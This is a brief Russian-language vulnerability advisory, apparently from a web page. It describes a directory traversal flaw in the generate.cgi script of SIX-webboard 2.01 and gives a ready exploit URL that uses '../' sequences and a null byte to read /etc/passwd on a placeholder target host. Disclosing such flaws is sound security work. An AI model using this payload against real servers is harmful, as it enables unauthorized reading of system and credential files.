• Партнер

  • При обработке пользовательского ввода не фильтруются символы '..' и '/', что позволяет ввести в строке запроса обратный путь к директориям вне Web каталога.

    Уязвимость работает в SIX-webboard 2.01.

    Эксплоит (выводит содержание /etc/passwd):
    http://www.target.net/cgi-bin/webboard/generate.cgi? content=../../../../../../../../../etc/passwd%00
    &board=boardsname

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии